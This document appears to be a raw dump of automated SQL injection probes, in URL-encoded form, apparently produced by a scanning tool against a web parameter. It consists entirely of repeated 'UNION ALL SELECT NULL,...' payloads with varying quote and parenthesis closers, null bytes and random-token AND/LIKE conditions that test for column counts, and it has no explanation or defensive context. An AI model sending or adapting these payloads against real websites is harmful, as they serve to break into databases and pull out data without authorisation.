1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22lgWf%22%3D%22lgWf 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22JwQQ%22%3D%22JwQQ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22rrtE%22%3D%22rrtE 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22hGyh%22%3D%22hGyh 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Ycui%22%3D%22Ycui 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22fsLY%22%3D%22fsLY 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22JXEm%22%3D%22JXEm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22OtBo%22%3D%22OtBo 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22sthD%22%3D%22sthD 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22iVvq%22%3D%22iVvq 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22COdu%22%3D%22COdu 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22zQEg%22%3D%22zQEg 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22HVXn%22%3D%22HVXn 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22Gwgv%22%3D%22Gwgv 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22dAwR%22%3D%22dAwR 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22XPsY%22%3D%22XPsY 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ovsF%22%3D%22ovsF 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22XCgT%22%3D%22XCgT 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22WSTn%22%3D%22WSTn 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22CTsx%22%3D%22CTsx 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22fAJL%22%20LIKE%20%22fAJL 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22Opaa%22%20LIKE%20%22Opaa 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22WNxF%22%20LIKE%20%22WNxF 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22ZpeC%22%20LIKE%20%22ZpeC 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22TWIu%22%20LIKE%20%22TWIu 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22TSyJ%22%20LIKE%20%22TSyJ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22TZTN%22%20LIKE%20%22TZTN 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22saKr%22%20LIKE%20%22saKr 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22OhVt%22%20LIKE%20%22OhVt 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22DiLD%22%20LIKE%20%22DiLD 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22GLCs%22%20LIKE%20%22GLCs 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22qThU%22%20LIKE%20%22qThU 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22WDlC%22%20LIKE%20%22WDlC 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22FcAP%22%20LIKE%20%22FcAP 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22mFBf%22%20LIKE%20%22mFBf 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22VeIt%22%20LIKE%20%22VeIt 